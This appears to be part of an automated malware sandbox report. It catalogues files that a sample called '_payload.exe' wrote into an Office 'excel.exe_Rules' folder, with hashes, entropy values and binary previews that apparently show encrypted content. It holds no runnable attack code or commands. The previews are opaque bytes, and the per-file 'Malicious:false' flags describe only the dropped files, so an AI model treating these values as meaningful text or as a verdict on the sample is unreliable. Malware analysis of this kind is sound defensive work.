                                                                                                                                                                      Preview:<?xml9.L....K..t`..C....2..i...&......Q.I;...(.c.R9..(.z`.h.oQ.t...:g.k..?..uDu18(.v..........w....[qV.s..d8.!..U"hq@.O.u.M...,...9xJ./v....|."n]"d.?..E...g.>.Z....I....+.X**:<.f..c.Mmc...t...c..~...........E..K..Y?.4..xC..|....SU.K2[..H...t^..|....XYK|..{-...P......&..\..b....v9.*..c.y...".......z..x...:...<w."(.}U...-{.4..D...6.`*:......".@...AO....a.....H/R...3..wu....o2.m....B}.C......}....T.=.(.w....].Y...m.&oX=c.xdg.&....E.z7...W...)...2v.......#...F|.........b..D..E_6.H.A....*,&.(..&u.}?.aT..8.2NF.....|...8...-e.av.m6b.]..?.6?....j.G.lk..m.`...?..3.........#vg."=....=?..5=^..P.`.i$.K...z..w.o<...]..5w.%_{..{..B.{.hM.....#R*..{....).. .N....".V.....|t.]..$P...D,..@.Y.-7.....g........a..CPM{.2....DU.!'<L.y.T=.....6.O...z\S}....}4CB\.X.\O..].d./.g....[....L!v ...=&#..]f..w.....=....0..'..Vi.../..^.#.&..[.@.w.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324011v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1000
                                                                                                                                                                      Entropy (8bit):7.77800074108413
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:NXWlBAy9lmfdzQ1ViUKgrpTPbS5b6wfJF2bD:NC7om1qg17bSt6GeD
                                                                                                                                                                      MD5:07CBC61B34B9C9818357A2E381B7B3BA
                                                                                                                                                                      SHA1:038F7A516A3F2842C2D872121DBA091CE9D24FDB
                                                                                                                                                                      SHA-256:F6D6112D82AA97DAA137D2A3786E51B6A85F1476989244750F99F3DFF6DEC095
                                                                                                                                                                      SHA-512:DD389F84E6F3FADF85713FBD9F6394ACA25BBDE364E9C5F1A6D27B68D713DFAA364586EBC782657E6AF1CA94CFE644AA8624A11F28CD58735621E5A1F21A8402
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml4\x$...?5.[..._.y.....Bn..N....L.Ni...... U"..3]i...DnZ.:...]......q..@c.u.o...s-.ZW.z].........8n..q....f.[&.&.....G....^....B...UG........%?S$.4K..\.N.....#p..9.5.7+.'..$...6......HCnRa...6.=l.......6T..u..L.r\W.-J.[..Pd*.0..v..S..1.I.s..._..RP.S.A..~....kt6_8.R...H...>f......)..(..R....._..\+.E.I.C.p)..5&.@.-.^#...X....]~.K..3.......o..xfK...!L4i.DE.Tu8...P..0.&..Q.?. {#<....$'..2...^.(.d..h..".....e.KU.F.N0n`.;.B.@Y...O.Is...c..%..e.2.;..p2..yY.36.I3...7.......C.....A..u...\.xn..9..r...w.N..9<..-7...W...w...|..5..X.y&|..6..T.....*.....(c.}.,.`.`....>n7./....o...#.O...L."N..}2k$..T,..OW..>..vn)...x......V..-#arA..0vG.[Jd...H...^4...B..(.yA...G!.-!.|0*..O!/....=.P.J.... .kLd.......R%.6...%...n.\......=......'.../5..%...^.......GE.2|d$...{/.p.^iC....../f..<....O......&d..3.=R..O........5...<.E.....T..-....*..!......P...S#..d.N.7z..B....<W../...Z...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324012v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1498
                                                                                                                                                                      Entropy (8bit):7.8730602502124425
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:LQPNPf0IsOpyEQD4XBIPsKN9pEbIueXnvAFMTiBokN6NghFDaBv8X2bD:APf/fpyND4xIPsKLpEcXvnwTLUD
                                                                                                                                                                      MD5:AB609090DD49A9E8B61E28A247CDCA22
                                                                                                                                                                      SHA1:CF5CB500B32A95E14662D5E624C701A77E774A25
                                                                                                                                                                      SHA-256:51CDEC8EF8FE7A53E9563A73199B4DAA0A63674E909EA80A7A2283C2B1D162B2
                                                                                                                                                                      SHA-512:B53E5AA8D05DCBBA3300CC3BD20AB53BC77735D385DF1333ED4B45F802136032574BD0EFE341C6A0D90B3F716D16EB50E8BD86B9833FF3199F9170C3DED7D5DA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.^.m.@e.1.G.?..0..m.~..kE.vu.^@.$.h7..7.?..].|.'0.s..\}.w.j..\...w...l....)......)....`$.'..;...V.}..............X.v.bH.<p.9.k....eI.B.eb........fR,T.....n...8..v..c3.f.+...-.a3.9...5L....~...ko.....$.5@...z..L....o.*.....YlV.u.x.5:y:......od4XF.Xs.....?.4...<....w.&\............J...Q.lIbJJ..,$.j.<$*.&v-9.S%....p.4.nK*1..{.4..[...&.9j....$.8j?<..kM.:+@.xj....?9.....C.R...l5..<.{.Y...:J...6[.#X".,ib..7.?.}Kq.a.>.Y...YQ.q....1A.......I.F..k.7.S5{.u..vjr....M........&;ou.1j.6#.Z...fpU...+...`.V......V....\m....I0..n...`8.....l.e.s.y..mM]....Z.x.m...E../'07.'|..l../..+.E...2.....9....ry.......V}..8..Lk.Z..g. *.f..O....~.+b.X..f1C...SJ..2.q"..O,u..]..L...W..%...<.....`.[.b..>.D.d..L.Z].O..sbR.&8..e..0d....^.-v..F.....T*.J.(.1.......{....nb.cD.... 9_Y..!.i....C....J.F..../.7_.KR8.....GN......?Z....U.Q......T.`n..........f.[.x..2(..!#...$.^T..@.../.Ns.)F..rp......1...E. ...X.Q,3.T...]u......9..K.s...TJ:..npF.....Q.t .1.X.y.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324013v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1357
                                                                                                                                                                      Entropy (8bit):7.860290110520929
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:4crTpt7FwT0gu3yvPRnGlkUGHY51x90KTre6WIog3Kb/qVIpqWoo+2bD:jyyyv5nGPWKTr0mGFqslD
                                                                                                                                                                      MD5:DD36A5F949D6543BA51E8635A16A4675
                                                                                                                                                                      SHA1:496D9AAF6A99A6707661ECA998EA223903336B94
                                                                                                                                                                      SHA-256:4F601E77A054F3305D42CF9F58E2E78719920E63C7E2399DC1D48B13ECAFC88C
                                                                                                                                                                      SHA-512:8227D303EC974A8516EE8F3D3492B7EBA50310248D9FA6452AB6AA17E220F2C3A6DFFB4D3C2C1D0994CF2E96B6B6961C1C4761080C2989EE86D1D89FC2E49835
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..M.D.......m.1.......$*.:#........NYA8....ql..=......`... C.Lxj....O..S.)E.zH.ve.B.4=.^.)...`]=..aL.X.0...35. .E..!..F.MW%.m........ W..0.?../k..m..R.|%...../....i#^.}>.E.x.x..9...j.=.kr.]...Y...\.$9..Mu..j.8......9..r....'...|....2.y...hK..V2..*.R*~.#T...|.w.M.)zU..,.\<'..Y..%..TH...?.}..J..;!JjI<y.Z:....n.z.(a=..Fd...{3..>.J......8S.....R......roD.S...t4..OC...1.....s.3..[.}..v.(z.&1G............!.e.........#.D./).z=..H&.[?..d...:2C.j...2........?1.h..X.o@.]....+...S...>.5j.?}c..^Df.<r..R.... ...9K...z.U..6.....f8r_....lW..~...../.4B.......YE./..U.+...G.....j.).l.t..G.....@QD.O........=..#l..}...p.e..N....1.L..}K....5...S1...WPt.................Y. av`X.;..,'.p.S..!..B..t..W.K..`C$..mT.m.u..<".......a1^...M.4./...F.A.r...Nj;.X...x..=.....=]?..b.x%..>...r -.\%M.}.q...R-.V..e.r,){2..d?_..1.,......K..ZHR..\.=D...j..M....&....:...^F.l)..,.S..o..n.P?.n.y...]&P....../.a*N........{.........D....y....l...V.;..5.(..?rZ.._....j.\...}...+..)

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324014v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1049
                                                                                                                                                                      Entropy (8bit):7.820430288785481
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:4MFobO+YqOxJzMUCIz8XKbbpPSD7hyq1C22d2bD:GC1qO7tCIGK/hw17B22D
                                                                                                                                                                      MD5:8B4C2D0B2E5A0C088718752E7026BF92
                                                                                                                                                                      SHA1:F42CE7F7F03048A46087FCD50B0B42D1590C629A
                                                                                                                                                                      SHA-256:AA2F1E49A12D8C78F0C960EF80A454E42B7D57CE9437F13E12D72A7C617923BB
                                                                                                                                                                      SHA-512:62524E513352CDE65336B06361DCEFFE513960189988DECC67F13207CBF38696072B94196ECAA59C772D02CBE97499EEAE4C6EB332D63A535663B5BEA350B064
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....c.L.J.........`.f.n...BN.y.Mxw.H}...{a...V'...k.......vs.2...Y*.."."JG.a...8js.K......7.{A.1.,.K....x6-........;...9.I.(vN.#h.D.g..u.x..9.AA.k.Z.Oz)Q[3..N..fK).*T..R.....)....gY.K.....!/..#uv.......";o.....:........x.....Fbxc............%G......8.6U5WEX(.c.^..../....'L....%.p............|...%...n..AK....KZy,.>(......p...}.k.....x?.y...f..G_..i.!.zf.v......9...>I....H...FIr.O...t....e...w#0M<.Q.....YKZ..m.."&..[.B.\Q..U..p.e..jk.g...Q.h...:...|d..............t{<n...xa..g....I....6....R.m..!...1N.0........f?Eq.h.Ed.....Tb:S....bU..(..|....`.P.:.,.i..X&...}.....~.\......,......m...|.hY......@.C....P...f..l........-L@...O..71.).AL.;v.....m[w....s)...Mo.~Y3L"#....GV....L.g>.Apb......o.O.....&../J. !..Zf{U.TS.+/|r@B.5.q.$..xc..V..}.@.P..u.2=.JM5.HL.t..Q;..v*...+..O..R.....=.oX.s.8..0l.......U..u.x.+..%.. .......E.;.1v.<xm.E.F......+x...=.C.dxf...wD.^.#..|.>D$S.....W.. ....Y..1..T3.....6....Sj..je...w.8...mMsRxMUuXypapZbGOAfxD9pczHmW8

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324015v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1184
                                                                                                                                                                      Entropy (8bit):7.825487010462878
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:TSMf024ajrotvBgg5RmZKhQZnm2ScQeBS+/hgnQvt7s4y2bD:JfqajkCg+XRHScQcXJ317RD
                                                                                                                                                                      MD5:02C13F0588DDF711D6ED147CC034E440
                                                                                                                                                                      SHA1:BAD4143E74F6892FF1462E87FF2EE71BAAE8DCE5
                                                                                                                                                                      SHA-256:86DF08CF640DBFE9E016BD75E643FA0DE124C9DB04C6B842D7399CD14ABF9340
                                                                                                                                                                      SHA-512:D2AA50E33B328D00547A2058C403E281F1EACE20B049AD7AC8C3E433C07956C8B8470C69358D87EA518B02BA231F83145D55AC775180C473AAFEA4CA792CCDA9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlD..8...C.BL.=.P@f.....9.........../^w............(.5:^8.....+...u.J..R..."}.O:@fd....i.2'.Tx..+h;S@...'..\...@:.q.B. .eSq*...=......v...:.Z{.k...J...`+2...<i.CO6aOSC9.....3++F...?`..T.....d.c<G.4.PU...A......+(.X..m.'.l.....s..LB...B.(.Y...*+.Ok.R.tr..W...FS27+`..m./........E.>....{V;...{.kX..V8?I.o..E.X1..u..u.O^.E..m]y U.H.>v!.}.E`@..G.{.'.j......h.Qh..o.>#.D........V.....X......V..nf....P;U[C..Z.)Vg....".h..c.W.f.>.-.}c..G.i...>W...ce....%-..8@.f..T....E.Q.s:.....g..=.&.J4xz..B.R..h..F8.tAM.z....@. .J.D.`.E.|..(.X...!...E..y.dH.h.i.6.fy7.S&%Q).....O..P....,.....',V-W.d_.;3.N..$.U.0......)...z.S..A..a=.h.}*~.G..d..l.._'...<.ZcBM...{3..x......s.s..T..I.....p.....E0lL..U.(Iw.N...D.O..4I...y..{..x......;.9Yol/K..[....PV.2."..eW.;.d..i_ .=.....7R..I.0/;......wT...$..5..0?M.4..<i..._.5.8O.qIl...c.a21..sL....&...z.......`F....K.!....:.".F4....p....R..K.E$T.K9..(#...wR.q.K..r.*z.,..*i..U.D...g......O.....p.Y....~|...?_..4....T.'J.y..v

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325000v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):9303
                                                                                                                                                                      Entropy (8bit):7.980002654261621
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:eOZBBH+3dF6SXKzSDCF+ZxlRqOCgmllvEgnkIRyRqadTCe:Bv+3736ODCF+ZxVCNCgXDadTCe
                                                                                                                                                                      MD5:1E2B79FC42F4ACD85B362F7A0E69A2C3
                                                                                                                                                                      SHA1:6C89581588F6CE76FD6A8CAD2EC5562F8510DDE0
                                                                                                                                                                      SHA-256:87CA17BB79B3D20E79D560C80707B53E98E462161A64EAD58536DE43C3A7DF54
                                                                                                                                                                      SHA-512:8E6014B99C40C1EDC26E86D7B1A4A728F6DC5EF4DA52BB570AD1DFF0A2222998EF9195A58E67D77FBC306E2B84BAEB43E7DD82579D0477B85D6CB548BFF7FADF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlr.....Z.......F..Ip.zrb..l.]......r;.e..r...=.F.%e.H..+Y.v....,m.[Y.....hZ.....8.1...F.gz..!.,q......7....l.N....Yw7...Ab...vQUd..W?..@J,41.g....J+*P..Sl.._..T..h!.B.....N.\a.......f"E&..>..m.K/...&.g..TX .9.I..K....d0...w.}.N.....P.^s.v...N@.. Q9.\../2..=^b.Q....1.$.e.......T.+4...t.(...f.u!.c.c..[n...|7.O;.j..._.D.M............wn....s.x.[.....zF].`..M)`..j...L.u.Cb...U...Bq.;.v._...e....B.._G.b.tR.....I..k..?.f.....a(...>.w.5.^...F.._.]Q..-R.Z...`H......%...F.#S!J.B*L.k.K.5D...FN..T.......k..~D,.......$...C8._........1......n....*......T...U.E...:........K.c...$.e8z&.....=..()..]~g.h...%Pe+^...g.9..NN.......2.l...Y..y..D.&e........Yn....^]n.9....!Be.<.{U.B.Z=t....S...`.?.K.....m{...z.t..xIZ/....*A.y...{;.q.....M..{....]...C..g.......S.../..'......]G.r!SF,.J....k...op.a.&.~.Y.....K.@...(.%.. ....+..M~~.-..XH...`..,../..Z..ZP....8.R.......p.......a...[.D=t.x.e.....@.{ME{.!\.}.Y....Irj.V.......*....0.`........i..6.....!...".az+"...P..u ..i.m..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325001v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2318
                                                                                                                                                                      Entropy (8bit):7.914487276821192
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:NXTjlDaACQ+kH1NgVd4LEUqk5jNDRmbgxf1Wj6n4D:Z3lkQj1Ngr4LEWjNlmbgxf6
                                                                                                                                                                      MD5:FC26DF0CF77AB15623F02349C8F01818
                                                                                                                                                                      SHA1:BC52AA651C4A1B5A1B1BE084754F74A842C2ADF2
                                                                                                                                                                      SHA-256:DA7D238FCD3AE4CE88FB2084A8CC16C5207378D6824F2E1DD9C368740CB116F7
                                                                                                                                                                      SHA-512:7C52CC7B5A82B019EF4CE039E4CE08D2DD79A5768AAAABE51ABEAD02144F5D69490F10CE1279565608E4C3DD0EDA01DA9375032CC841A09BCD6F9D1F10424CBB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.y}.BN.."...?>.5...<..........r.......'K..AP(.x.[.a..JQ.3z_\..A^.R...._..Ce.(..M..^i.2...j..L.$...k.a...t.4..8.( ..'_..2.O.co...x.c...V...........%!.. W.EE..E.H.'.....vfMPR.....:5...4a&DZr..Gk.H~6...2.W..Q.w.dX*.kD.t%.U...K8.j.A.. .TMY..._o-...zhr.. F.~+7.2..X.=......;..O.(q..G.!.E4.x.x.............o5f.r'.Q.M5}.....(..s.N.z.J.....@.S3W.&R.D..r<)(.q.m...T..R.......f...l....xs...(.....u.T.<O~.y.nOq]....Z....$....T.1lJ.. ..yTLz.._Ug.-.}.a.M'.G.1.>.M.,8..E.2k.O......X=.t..OX?.S59.~M...{|.*...h....*..@...?B.yP.S.=...C.Kq.C...:5.B....d..]..H....^.w...E...$...j..~.C...{.z>..M...s..k.GvH..7d5,...kl"..z...Q.j.z..>..e.nv.Z.]....~.<b-...d.....Y.m...'..0La1.~../.K.....%..5..&..r`q..a..S.....k.*..."g..fb_.....CcN.`1.(e.l.+.......+....u.,.....p.....w..x..Iq`...p...>;.....7B.*....fy..I.'H......s}8..z%...).....H...[u...s.P..p...'.w.....,.=..|".$...cI.6....U.X...8.@..:..2:.~<...q.....-hP.-f...<..Xe.$/T..\o*&_z.e..i56F..O.h.E!...t.;.....6b..2

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325002v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2388
                                                                                                                                                                      Entropy (8bit):7.907662590503457
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:FYloTaZ1/xb5GzBvmqtzDlJIHy9NsHdkINLNr3hafoF8QQJtwB5E4xD:U1/xV+NmqtzYH6q/Nh3QoF3Qm
                                                                                                                                                                      MD5:3A98AECC8A4EEC3AFF36B830D69BFD4A
                                                                                                                                                                      SHA1:A638F6BA1E04EB8D8E7C2F4C12B816FB6F86EAB5
                                                                                                                                                                      SHA-256:2A15CE406F719209A654C0E44E89C608C70F2B2BFE60783C6777166DB5AFE681
                                                                                                                                                                      SHA-512:FDD24DDF85483E441FFF3F3DE7D9BFD68D4B8EBAA9675483B677B94F73F8BF48BFD7949805FE15799D0D03E8D48EB08C5906BCB14351C97B303173784CE46FB2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml".Z.k!..lfW.4bt....n..G..h~_..}...D@Z.a...!..p...Z.4J8.u<Z.....Z...G<e..."y.q3........g...k3..-R..p.t.T...../S.Y.:....M}....H.}ZYn.-.y.xs8`h.......f...j....Z.n2 ......F..........=....C..RH.E8;..."...6.t...MT..!D)+a+..t.6w<./..~..).U.....p.N.C)k.k.,...>..DT.hx....|<......c..+.$/...up..;k.....|.gfH..T...L^F....W.x....X..k..u....(`...)......#6..G5;..O.#...Q.I. .c.?s>.Y%..T...j..`....3....]..*.[_....K...s..Y.{.S..h..,../..2In.l.jG..../...E.{?..}........)...TV...z%...'n..s.W......Z......x...V........9f2W.c...)....sODY.>F.....M...!.m.]...7.....!......-..z.qFdI..Sj.'o>OS....^Z.:...y..i...d.Jh.g....|..S.......}...akn6..76....y..l~}.1A..x.f.FL.E...t..#..@O.Qp.6.q.......2..........n...A#.f..*R&b...3/....D\.b.....^.%. ....../...;......0..G{.8.h.GV.R.6-..:..&.U.........".....@...Y.P..'.. ..8..X.A..7....Oo...:^......p.WO'.SxA...c..i..Z.z8..*..V.....G..M.....i.P.=P...o..E:.d..ft$.5&....32...O...v.td.Q.S.L.....<.Q...pq.V..{..a..M....0e....G./.;.../

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule360000v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1197
                                                                                                                                                                      Entropy (8bit):7.799922516378665
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:uCdymh2oah+hb35ZLXW1LPEGFwj8YeUjg50TZL8ewZi2bD:uC07/U75LGwjqU050tIemD
                                                                                                                                                                      MD5:738FEC843BAFDF6C4ADCD887F66822B9
                                                                                                                                                                      SHA1:A8F1051AE941EA7C8E6B4DCD5E0D4F4BC5F8CA0C
                                                                                                                                                                      SHA-256:2A3DD6BA8C5153C80CADDF55F0F72D306124805BAA7D0817FFF2E6C23A2DD528
                                                                                                                                                                      SHA-512:31EA4B3DE71C6D87D3BC62F8AE661A136183A64AF4C1DFBB2704AD2072A50BA7E3B91DDC6809B2C1C3E1A2489A02113AE8102F3FDF61DFC9C636B502C8D3E679
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..:f.(...p^.=..2h...>.vW...XM.~.H;.3m..?r.:wM?..,..Q......q7.P....v..@../..J.}.....]Q.....}..^&./|..P.j.I.$...z.<D(.....1t.}.M/...I4....m.HPE.V...L^...A8....*v..[O...s.Ys.h.].6+..d...A...OYqa..I..x.......;7EZ..bc.@=P..H...\.@.\.[..m........].:..C./_.M...\.oh}5w!...U{.......q`..:^.s.>.....>..;...}.gv.....BdX.l.V...Z.|!.#%... a....2...3?.\9..3m.5[.R>.g.N.^.u...4.......q ..ER=.F1..=w.tR._V;o..+.,=eG......{Q..y..A....2%44..T.L..]z'..G........{.Xk_.E(;6.........T...)=.}WR...O..!...b....).E...v.Bq....M..|..p...K.F..y.p..?`T.....P.p~Z`..#....'(R2[p}\......L.R .....r./..G.*...g...\K.b...y#.R..dZ(.^.c.I..^..@.H~_.H...._NN..7..{.wyK......E.&C.....!..r~.#.._.++.+D.C..7m6...Z.,..].r,~.^.[..2.d3.w.0...'....V0yW...DM.2.U...7C...].R......y.j...i.......m.F..(.a...`..;.N......wY...r.Q...[.#.Ssl...5]../...}P..9}E1!.Q.....S2.W..6'<..Y.~....1a...L..O......$.......U"U.a......`...t..._!....p.!..%.........%..1..Q..7..h.QBHq.WZ...|.y....As....Q....m&.,..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule360001v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):771
                                                                                                                                                                      Entropy (8bit):7.733009568545856
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:K8X8C+UPlELICmC76OdYlkR5Sg3Qd32bD:K8Xjn0cCWkR5SP0D
                                                                                                                                                                      MD5:5D4D05DE2C12EC6DB3EF7101D9F0579B
                                                                                                                                                                      SHA1:01AA297F17907971C048DE1501610D50E2994F0C
                                                                                                                                                                      SHA-256:1C81749C7C02E0A92D378D786ABCC5366D819988D82855E1397B802A7BDDA08C
                                                                                                                                                                      SHA-512:7CC53D4B58DFD7F85BFC848C0292EB5D61EE6381642F7904D599B7EC483561E3B43E93E35D8AD4F47104F62946DBA0D80CD8E604FE338DBF5B3A82F1705C7E99
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlJ.0.t.W.x.zn..;......}..!.vr.^.p....10..?.o.....T2..`.*._..[..$...=.69xb`/N6...E.......+...\..^D...y.)........-.+.H.|S.O..>....3k=U.].1.q:..[.Qz..........i.&.\.2......<...V}..q.. 4...j....^....k.nW!.......2...yr.B.1.K....b....:8....ox.\...o.@gO...,.....8...6.B.........%. ...\....&[..>.s..A! za...s{..i...0j<Ep.....8..j1a...D...,.5.WL...1.....K......e...b..............H..p..O...G+......... o..e.l..q.i..~E...M.Qa....4j...PV.y'1.:.[....g..`..j=H.R..........w.&.|.....7....4.k.....B....>......=y....F......).ekV..y...e..wc../.....,Q}.8pN.I...]....D$^....Q........l...=dH.@.!(.u.>...T.k.......a.[..=.y.G.......j...........F..D!....d.vP.~.+.%{.e..&../..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370000v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):863
                                                                                                                                                                      Entropy (8bit):7.686332194543482
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:8d4obn2CAgDbhqlO6RdMShPKeBvWsUuYwRM2bD:e4w2MDb6O6RhLNcORfD
                                                                                                                                                                      MD5:5DAAABD5DF6C63905E0C9305BC9DE8E2
                                                                                                                                                                      SHA1:F73E6CCEFDE4E7E8729929FC515A8F773A7C79F2
                                                                                                                                                                      SHA-256:511B5D03280C0D87C1A378C4670312BD79EACC178C7526FC01AE32AFCDCD5197
                                                                                                                                                                      SHA-512:7CD58074B9B6EF92EF9FB5744583D9BED5EC02E3956FD73DD8CD01EEF0A34F456945F663B14DEB3FB14D19208B9F2EA9F37E1277B41777FF672AE72228F887D1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.6.zmZ....B'.$.3.............l@.....G;.....~..Bg.f.Dh....7!.*.w.B..3....<.&8..a...../f..'..l...L...F.J.......6...HOh\....}.H5F....h...>M.....em/sh...|#......E.k.M-8i.7......8..ID..g.z..3-...Ba..N..|......5.!/8+.n..l7..(.......i.....EV.$.....gO.._..k.Z.|d0?Y.....'..,..Ou.W?4.n6..q..W,."_....A......D.|...=i....._!.}.V-..J...}?.z...5...M.1.b..B.....RT..eRxA..P{Yn.V..........2v....L.~..#..Rx...Un"d...f.}c<%0.J.....=.}~.z.M.b...>.^....b9..6......%hqIL..3....~5....N{F.ac\D..1.H~.^....Y^d..a.5.|...M.WE...j.j.;..@.jl.)..F.`.1...aV..z...E....s}Dv78<-..&g ...Np1P.~YnE..^-..syuM].D.../Y....J.H..G.E.,S .*G.j..V..,x.l.~B...4...EP.../s...^B;..A...M...hC..D...u0.+..[7>..r......Jn.......3.b..O.fn..u.".....o.....>!./..)x.Gex...W....J..G.W3...E...D..F..7mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370001v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2604
                                                                                                                                                                      Entropy (8bit):7.918286976216524
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:FZPJFN71U9hlGy5jUvbbQdim81nXp8sD4/Ohyp9sE0mp/KQSeD:FdJFN6hlfern58OhyYmNN
                                                                                                                                                                      MD5:6924BB7BB315E266DC3D9F95B80E92AF
                                                                                                                                                                      SHA1:22835BFAB17848D66199D49C13EEE870CF437147
                                                                                                                                                                      SHA-256:67D1211C08D021CB2A33165D632DC8C367F1895D9ED72396DC14182EBFF281A3
                                                                                                                                                                      SHA-512:4EA75DB09B98463942FCA8032B0FBEDBB51E4C40B360C87FFC41BDB523BD84B5731FA552C1AC937F17BA7FD5622213E25A728CFA13E795C6053B4D59F69D252E
                                                                                                                                                                      Malicious:false
